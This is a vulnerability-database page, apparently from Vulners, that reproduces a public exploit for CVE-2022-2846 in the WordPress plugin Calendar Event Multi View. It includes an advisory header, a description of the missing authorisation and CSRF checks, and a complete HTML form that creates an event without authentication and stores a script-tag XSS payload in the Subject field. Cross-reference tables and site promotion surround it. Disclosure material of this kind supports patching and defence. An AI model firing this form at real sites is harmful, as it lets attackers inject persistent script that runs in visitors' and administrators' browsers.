Vulners
Lucene search
Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS)
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to XSS Vulnerability | 5 Apr 202300:00 | – | zdt |
 | CVE-2022-2846 | 16 Aug 202222:39 | – | circl |
 | WordPress plugin Calendar Event Multi View 跨站请求伪造漏洞 | 16 Aug 202200:00 | – | cnnvd |
 | CVE-2022-2846 | 16 Aug 202200:00 | – | cve |
 | CVE-2022-2846 Calendar Event Multi View < 1.4.07 - Unauthenticated Arbitrary Event Creation to Stored XSS | 16 Aug 202200:00 | – | cvelist |
 | EUVD-2022-35080 | 3 Oct 202520:07 | – | euvd |
 | CVE-2022-2846 | 16 Aug 202219:15 | – | nvd |
 | Calendar Event Multi View 1.4.07 Cross Site Scripting | 5 Apr 202300:00 | – | packetstorm |
 | Cross site scripting | 16 Aug 202219:15 | – | prion |
 | PT-2022-19041 · WordPress · Calendar Event Multi View | 16 Aug 202200:00 | – | ptsecurity |
10
# Exploit Title: Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS)
# Date: 2022-05-25
# Exploit Author: Mostafa Farzaneh
# WPScan page:
https://wpscan.com/vulnerability/95f92062-08ce-478a-a2bc-6d026adf657c
# Vendor Homepage: https://wordpress.org/plugins/cp-multi-view-calendar/
# Software Link:
https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.4.06.zip
# Version: 1.4.06
# Tested on: Linux
# CVE : CVE-2022-2846
# Description:
The Calendar Event Multi View WordPress plugin before 1.4.07 does not have
any authorisation and CSRF checks in place when creating an event, and is
also lacking sanitisation as well as escaping in some of the event fields.
This could allow unauthenticated attackers to create arbitrary events and
put Cross-Site Scripting payloads in it.
#POC and exploit code:
As an unauthenticated user, to add a malicious event (on October 6th, 2022)
to the calendar with ID 1, open the code below
<html>
<body>
<form action="
https://example.com/?cpmvc_do_action=mvparse&f=datafeed&calid=1&month_index=0&method=adddetails"
method="POST">
<input type="hidden" name="Subject"
value='"><script>alert(/XSS/)</script>' />
<input type="hidden" name="colorvalue" value="#f00" />
<input type="hidden" name="rrule" value="" />
<input type="hidden" name="rruleType" value="" />
<input type="hidden" name="stpartdate" value="10/6/2022" />
<input type="hidden" name="stparttime" value="00:00" />
<input type="hidden" name="etpartdate" value="10/6/2022" />
<input type="hidden" name="etparttime" value="00:00" />
<input type="hidden" name="stpartdatelast" value="10/6/2022" />
<input type="hidden" name="etpartdatelast" value="10/6/2022" />
<input type="hidden" name="stparttimelast" value="" />
<input type="hidden" name="etparttimelast" value="" />
<input type="hidden" name="IsAllDayEvent" value="1" />
<input type="hidden" name="Location" value="CSRF" />
<input type="hidden" name="Description" value='<p style="text-align:
left;">CSRF</p>' />
<input type="hidden" name="timezone" value="4.5" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
The XSS will be triggered when viewing the related eventData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Apr 2023 00:00Current
5Medium risk
Vulners AI Score5
CVSS 3.14.3
EPSS0.03049
SSVC